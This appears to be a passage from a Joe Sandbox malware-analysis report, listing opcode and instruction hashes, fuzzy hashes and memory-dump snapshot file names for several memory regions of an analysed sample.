                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8ea6655332b13ecb48c28b22838454ebf3383790405bb39110ed7f0ea888528
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E34137D992E7C11FDB17477429652A47F70AE2722934E8ACFC4C1CF5A3E249490AE723
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627470793.0000000000F9B000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FA3000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fa3000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 38631f9b299e3044bbbc7be6418549dbd98720d5c2305472a65f311f3582c2b0
                                                                                                                                                                                                          • Instruction ID: fc26ef927f199f6ff910e03fcfc06efef4dbf718dc1fbcb8eb83945e5aa43d42
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 38631f9b299e3044bbbc7be6418549dbd98720d5c2305472a65f311f3582c2b0
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9831F29592E7C11FDB174B7429291A17F70AE2722834E8ACFC4D1CF5A3E249580AE733
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627352228.0000000000FCA000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FC9000, based on PE: false
                                                                                                                                                                                                          • Associated: 00000000.00000003.1578141492.0000000000FC8000.00000004.00000020.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_fc7000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 50f17dd4bfb8b3656bc2a343b8ccffa13ffaff920706ef5ea57eb4d68c3b845a
                                                                                                                                                                                                          • Instruction ID: d9c73f0a636180da2253c914cd477b7e2391b5918256df913f92c124f845ca27
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50f17dd4bfb8b3656bc2a343b8ccffa13ffaff920706ef5ea57eb4d68c3b845a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31A256C2E6C81FD7379B7448A09BA7FB6ED0337431D42C795E18A2A3D005DC09A327
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000003.1627783526.0000000000FF5000.00000004.00000020.00020000.00000000.sdmp, Offset: 00FF5000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_3_ff5000_biyhoksefdad.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: d2bcae00a392e354aa182a5d064101217642bec5d0d7d9b88485ae4256cdb099
                                                                                                                                                                                                          • Instruction ID: 20729ec876e4b19a153983bf656fb8657e5b730bfd11a35a51d284f9b5498d06
                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2bcae00a392e354aa182a5d064101217642bec5d0d7d9b88485ae4256cdb099
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1411A0B141A385AFDF12DF78C9D1A877B61AE977147498298E8805E007D364A523CB91